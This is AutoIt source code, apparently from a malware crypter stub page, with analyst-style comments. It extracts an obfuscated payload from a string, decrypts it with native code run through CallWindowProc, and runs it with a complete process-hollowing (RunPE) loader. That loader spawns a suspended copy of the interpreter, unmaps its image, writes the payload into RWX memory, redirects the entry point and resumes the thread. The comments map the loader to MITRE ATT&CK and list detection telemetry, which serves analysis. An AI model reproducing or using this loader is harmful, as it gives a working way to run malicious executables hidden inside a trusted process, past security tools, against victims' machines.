$HOPMPNVNFBLJMAEBPWGH7 = StringMid($HOPMPNVNFBLJMAEBPWGH7, StringInStr($HOPMPNVNFBLJMAEBPWGH7, "HUIF") + StringLen("HUIF"))
$HOPMPNVNFBLJMAEBPWGH7 = RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($HOPMPNVNFBLJMAEBPWGH7, "IHFSDIHIOHFSIHOFISJH")
; The loader's return value and @error are ignored.
FBTxWthxSleyxEIZwoaSrtztmANOBstRYvrNc($HOPMPNVNFBLJMAEBPWGH7)
; Keyed transform of a binary blob, carried out by native code held in a string;
; same function as in the builder part of this page, where a comment labels it RC4.
; The code literal on the first Local line was stripped from this copy of the page
; (placeholder text, string left unterminated), so that cannot be confirmed here.
;   $YXYETAWVTNXDTCRUFWNZ4 - data to transform (binary)
;   $HDAUJBVSHSJMUTFXEPQG0 - key string
; Returns the contents of the data buffer after the native call.
Func RRgSATclojwnMrIKpuHHhbsTAXOtcBRdBITRT($YXYETAWVTNXDTCRUFWNZ4, $HDAUJBVSHSJMUTFXEPQG0)
Local $EYTKUDBRKEFDDZLAKXKN4 = "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
; Copy the code bytes into a byte-array struct so a raw pointer to them exists.
Local $JIRVQRVFYRCZEBBVLKLC4 = DllStructCreate("byte[" & BinaryLen($EYTKUDBRKEFDDZLAKXKN4) & "]")
DllStructSetData($JIRVQRVFYRCZEBBVLKLC4, 1, $EYTKUDBRKEFDDZLAKXKN4)
; Copy the input into a second buffer; the result is read back from it below.
Local $WAMSDHOGJRVMNPVKQGYM6 = DllStructCreate("byte[" & BinaryLen($YXYETAWVTNXDTCRUFWNZ4) & "]")
DllStructSetData($WAMSDHOGJRVMNPVKQGYM6, 1, $YXYETAWVTNXDTCRUFWNZ4)
; CallWindowProc serves only as a trampoline: its first argument is the code
; buffer, the other four are (data pointer, data length, key string, 0).
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($JIRVQRVFYRCZEBBVLKLC4), "ptr", DllStructGetPtr($WAMSDHOGJRVMNPVKQGYM6), "int", BinaryLen($YXYETAWVTNXDTCRUFWNZ4), "str", $HDAUJBVSHSJMUTFXEPQG0, "int", 0)
Local $ZTAIPGIFAXOREGLKYMWO2 = DllStructGetData($WAMSDHOGJRVMNPVKQGYM6, 1)
; Assigning 0 releases both structs.
$WAMSDHOGJRVMNPVKQGYM6 = 0
$JIRVQRVFYRCZEBBVLKLC4 = 0
Return $ZTAIPGIFAXOREGLKYMWO2
EndFunc
; In-memory loader of the "RunPE" / process-hollowing kind (MITRE ATT&CK T1055.012).
; It starts a second, suspended instance of the current interpreter executable,
; replaces the memory at the payload's image base with the PE passed in, points the
; suspended thread at the payload's entry point and resumes it.
;   $DBMQXORDDWSNFPUYSUAV9 - complete PE file image (binary)
; Returns the child's process id on success. On failure returns 0 with @error set to
; 1..11 naming the failed step (for 9, @extended is the 1-based section index); from
; step 2 onwards the child is terminated first.
; 32-bit only: the CONTEXT layout is the x86 one and the PE32 magic is required.
; Header offsets and sizes taken from the payload are not checked against the
; buffer length, and the process/thread handles are never closed in this function.
;
; Telemetry this sequence produces, in order: CreateProcessW with CREATE_SUSPENDED on
; the caller's own image, NtUnmapViewOfSection, VirtualAllocEx with RWX protection,
; repeated WriteProcessMemory, SetThreadContext, ResumeThread - all against the child.
Func FBTxWthxSleyxEIZwoaSrtztmANOBstRYvrNc($DBMQXORDDWSNFPUYSUAV9)
; Copy the payload into a local byte buffer; $RDPZ... is a cursor that walks its headers.
Local $SBIKXSGRAVLUWIPAXAAG8 = Binary($DBMQXORDDWSNFPUYSUAV9)
Local $FQNMUYXHWPFJMQPPSYLW3 = DllStructCreate("byte[" & BinaryLen($SBIKXSGRAVLUWIPAXAAG8) & "]")
DllStructSetData($FQNMUYXHWPFJMQPPSYLW3, 1, $SBIKXSGRAVLUWIPAXAAG8)
Local $RDPZAWDJPCVWFHXSHJUJ3 = DllStructGetPtr($FQNMUYXHWPFJMQPPSYLW3)
; STARTUPINFO-shaped struct, left zeroed (cbSize is never set).
Local $AQYZPWFUNEZJYVRRELBM1 = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
; PROCESS_INFORMATION-shaped struct that receives the child's handles and ids.
Local $KTBXIKXYHPHPTXXBXBVK0 = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
; Step 1: spawn @AutoItExe (the running interpreter/compiled script) with creation
; flags 4 = CREATE_SUSPENDED, so its main thread has not executed yet.
Local $FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($AQYZPWFUNEZJYVRRELBM1), "ptr", DllStructGetPtr($KTBXIKXYHPHPTXXBXBVK0))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
Return SetError(1, 0, 0)
EndIf
Local $QAHCMXTRTDWHSBHKJVWN3 = DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "Process")
Local $DVZXVGMITVHCYPEAORRM3 = DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "Thread")
; Step 2: fetch the suspended thread's registers. The layout is the x86 CONTEXT;
; 65538 = 0x10002 = CONTEXT_i386 | CONTEXT_INTEGER (general-purpose registers).
Local $DCSAQWEGABYFFEERANAQ6 = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($DCSAQWEGABYFFEERANAQ6, "ContextFlags", 65538)
$FOADNRFSFHWOVGQYKWWB0 = DllCall( "kernel32.dll", "int", "GetThreadContext", "ptr", $DVZXVGMITVHCYPEAORRM3, "ptr", DllStructGetPtr($DCSAQWEGABYFFEERANAQ6))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(2, 0, 0)
EndIf
; Step 3: overlay an IMAGE_DOS_HEADER on the payload. The cursor is advanced by
; AddressOfNewExeHeader (e_lfanew) before the "MZ" magic is verified.
Local $UHUUUYDHZONNOYAAVAPL3 = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += DllStructGetData($UHUUUYDHZONNOYAAVAPL3, "AddressOfNewExeHeader")
Local $FUXEKOQCSLVFFYXRDWQJ6 = DllStructGetData($UHUUUYDHZONNOYAAVAPL3, "Magic")
If Not ($FUXEKOQCSLVFFYXRDWQJ6 == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(3, 0, 0)
EndIf
; Step 4: PE signature; 17744 = 0x00004550 = "PE\0\0".
Local $CQJQRNZBEGRROZTQKLYH3 = DllStructCreate("dword Signature", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += 4
If DllStructGetData($CQJQRNZBEGRROZTQKLYH3, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(4, 0, 0)
EndIf
; IMAGE_FILE_HEADER (20 bytes); only NumberOfSections is used.
Local $UGSSFCZLMKKQKJKHHKMV8 = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $RDPZAWDJPCVWFHXSHJUJ3)
Local $LSUMNEDTUHGGSAFJWXBG6 = DllStructGetData($UGSSFCZLMKKQKJKHHKMV8, "NumberOfSections")
$RDPZAWDJPCVWFHXSHJUJ3 += 20
; Step 5: fixed part of the 32-bit optional header (96 bytes); Magic must be
; 267 = 0x10B (PE32), so a PE32+ payload is rejected with error 5.
Local $GCFXTWPIAEDVZDQPLTOY3 = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $RDPZAWDJPCVWFHXSHJUJ3)
$RDPZAWDJPCVWFHXSHJUJ3 += 96
Local $FIJIRSNJPLAJOIVBCMHE4PQDCEROSGAHRRBONTVS0 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "Magic")
If $FIJIRSNJPLAJOIVBCMHE4PQDCEROSGAHRRBONTVS0 <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $BMRGXVFQWVPUONGXQEIV8 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "AddressOfEntryPoint")
; Skip 128 bytes (16 data-directory entries of 8 bytes) without reading them; the
; cursor now sits on the first section header.
$RDPZAWDJPCVWFHXSHJUJ3 += 128
Local $ETAMFTKFHXEATYABLIDV1 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "ImageBase")
Local $GVMQNZZNCJVDAJCALXYR6 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "SizeOfImage")
; Step 6: unmap whatever the child has mapped at the payload's preferred image
; base. The call returns an NTSTATUS, so any non-zero value is treated as failure.
$FOADNRFSFHWOVGQYKWWB0 = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $ETAMFTKFHXEATYABLIDV1)
If @error Or $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(6, 0, 0)
EndIf
; Step 7: allocate SizeOfImage bytes in the child at that same address.
; 12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE; 64 = 0x40 = PAGE_EXECUTE_READWRITE.
; A committed RWX region the size of an image in a freshly created child is a
; strong memory-scanning indicator.
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $ETAMFTKFHXEATYABLIDV1, "dword", $GVMQNZZNCJVDAJCALXYR6, "dword", 12288, "dword", 64)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(7, 0, 0)
EndIf
Local $RZVLCLCLBTZXORYFDDJP9 = $FOADNRFSFHWOVGQYKWWB0[0]
; Step 8: copy the first SizeOfHeaders bytes of the payload to the new region.
Local $SSCRUUOGKDHRXWJHLNVJ2 = DllStructGetPtr($UHUUUYDHZONNOYAAVAPL3)
Local $DQKEROXCGHKVJHIFPHVL4 = DllStructGetData($GCFXTWPIAEDVZDQPLTOY3, "SizeOfHeaders")
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $RZVLCLCLBTZXORYFDDJP9, "ptr", $SSCRUUOGKDHRXWJHLNVJ2, "dword", $DQKEROXCGHKVJHIFPHVL4, "dword*", 0)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(8, 0, 0)
EndIf
Local $RJATWTKKNFETRTMFBJIO1
Local $KINPUJGTLNNGEYNXTNBY7, $EXJIJMOAEYYEQPBVEOZN0
Local $VHTUIZBBZGABQHZDVZOL7
; Step 9: walk the section table (40-byte IMAGE_SECTION_HEADER entries) and copy
; each section that has raw data from file offset PointerToRawData to
; base + VirtualAddress in the child.
For $FIJIRSNJPLAJOIVBCMHE4 = 1 To $LSUMNEDTUHGGSAFJWXBG6
$RJATWTKKNFETRTMFBJIO1 = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $RDPZAWDJPCVWFHXSHJUJ3)
$KINPUJGTLNNGEYNXTNBY7 = DllStructGetData($RJATWTKKNFETRTMFBJIO1, "SizeOfRawData")
$EXJIJMOAEYYEQPBVEOZN0 = DllStructGetPtr($UHUUUYDHZONNOYAAVAPL3) + DllStructGetData($RJATWTKKNFETRTMFBJIO1, "PointerToRawData")
$VHTUIZBBZGABQHZDVZOL7 = DllStructGetData($RJATWTKKNFETRTMFBJIO1, "VirtualAddress")
If $KINPUJGTLNNGEYNXTNBY7 Then
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "ptr", $RZVLCLCLBTZXORYFDDJP9 + $VHTUIZBBZGABQHZDVZOL7, "ptr", $EXJIJMOAEYYEQPBVEOZN0, "dword", $KINPUJGTLNNGEYNXTNBY7, "dword*", 0)
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(9, $FIJIRSNJPLAJOIVBCMHE4, 0)
EndIf
EndIf
$RDPZAWDJPCVWFHXSHJUJ3 += 40
Next
; Step 10: put base + AddressOfEntryPoint into Eax of the saved context and write
; the context back (on x86 the initial thread of a suspended process carries its
; start address in Eax).
DllStructSetData($DCSAQWEGABYFFEERANAQ6, "Eax", $RZVLCLCLBTZXORYFDDJP9 + $BMRGXVFQWVPUONGXQEIV8)
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $DVZXVGMITVHCYPEAORRM3, "ptr", DllStructGetPtr($DCSAQWEGABYFFEERANAQ6))
If @error Or Not $FOADNRFSFHWOVGQYKWWB0[0] Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(10, 0, 0)
EndIf
; Step 11: let the thread run; ResumeThread reports failure as -1.
$FOADNRFSFHWOVGQYKWWB0 = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $DVZXVGMITVHCYPEAORRM3)
If @error Or $FOADNRFSFHWOVGQYKWWB0[0] = -1 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $QAHCMXTRTDWHSBHKJVWN3, "dword", 0)
Return SetError(11, 0, 0)
EndIf
Return DllStructGetData($KTBXIKXYHPHPTXXBXBVK0, "ProcessId")
EndFunc